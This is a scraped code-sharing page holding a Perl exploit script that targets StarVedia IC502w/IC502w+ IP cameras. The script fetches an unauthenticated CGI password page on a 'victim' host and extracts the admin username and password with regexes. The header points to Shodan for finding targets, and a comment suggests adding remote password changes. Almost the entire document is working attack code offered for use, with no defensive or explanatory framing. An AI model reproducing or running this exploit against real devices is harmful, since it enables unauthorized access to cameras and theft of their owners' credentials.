扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 |
#!/usr/bin/perl # #[+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit #Author: Todor Donev #Email: todor.donev at gmail dot com #Type: Hardware # #Thanks to Tsvetelina Emirska the best friend in my life #and all my other friends for the help and support which #gives me. Kind regards to all of you, who read my lil' #exploits. #Bulgaria, Sofia #03.2013 # #Shodanhq r0x 4 teh lulz!! #http://www.youtube.com/watch?v=qNyN1AY-YZQCheeerzz =)) # #Another bug, hint: you can edit this code and add some lines for remote change the password. ##### use LWP::Simple; if (@ARGV == 0) {&usg;} while (@ARGV > 0) { $type = shift(@ARGV); $t = shift(@ARGV); } if ($type eq "-d") { my $r = get("http://$t/cgi-bin/passwd.cgi?") or die(" $t: Not vulneruble, $!\n"); print " [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit\n"; print " [!] Exploiting: $t\n"; if ($r =~ m/<INPUT type=text name=user size=20 maxlength=19 value="(.*)">/g) { $result .= " [o] User: $1\n"; }else{die(" Try another exploit, $!");} if ($r =~ m/<INPUT type=password name=passwd size=20 maxlength=19 value="(.*)">/g){ $result .= " [o] Password: $1\n"; }else{die("Try another exploit or restart the exploit\n");} sleep(1); print " [\\m/] BINGO!!!\n\a".$result; } sub usg(){ print " [!] usg: perl $0 [-r or -d] <victim:port>\n"; print " [!]-d: disclosure password option\n"; print " [!] exp: perl $0 -d 127.0.0.1 :)\n"; exit; } |
体验盒子
